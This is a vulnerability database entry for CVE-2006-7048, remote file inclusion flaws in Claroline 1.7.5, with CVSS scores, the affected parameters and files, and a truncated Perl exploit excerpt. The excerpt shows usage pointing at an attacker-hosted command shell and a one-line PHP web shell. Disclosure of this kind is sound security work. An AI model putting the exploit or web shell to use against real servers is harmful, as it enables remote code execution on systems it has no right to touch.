7.5
CVSSv2

CVE-2006-7048

Published: 24/02/2007 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple PHP remote file inclusion vulnerabilities in Claroline 1.7.5 allow remote malicious users to execute arbitrary PHP code via a URL in the (1) clarolineRepositorySys parameter to (a) atutor.inc.php (b) db-generic.inc.php (c) docebo.inc.php (d) dokeos.1.6.inc.php (e) dokeos.inc.php (f) ganesha.inc.php (g) mambo.inc.php (h) moodle.inc.php (i) phpnuke.inc.php (j) postnuke.inc.php and (k) spip.inc.php in claroline/auth/extauth/drivers/; (2) includePath parameter in mambo.inc.php, postnuke.inc.php, and (l) inc/lib/event/init_event_manager.inc.php; and (3) rootSys parameter in (m) inc/lib/export_exe_tracking.class.php, a different set of vectors than CVE-2006-2284.

Vulnerable Product Search on Vulmon Subscribe to Product

claroline claroline 1.7.5

Exploits

#!/usr/bin/perl ############ # Claroline Open Source e-Learning 175 Remote File Include # Exploit & Advisorie: beford <xbefordx gmail com> # # uso:# perl ownpl <host> <cmd-shell-url> <cmd-var> # perl ownpl hostcom/claroline/auth/ atacante/shellgif cmd # # cmd shell example: <? system($cmd); ?& ...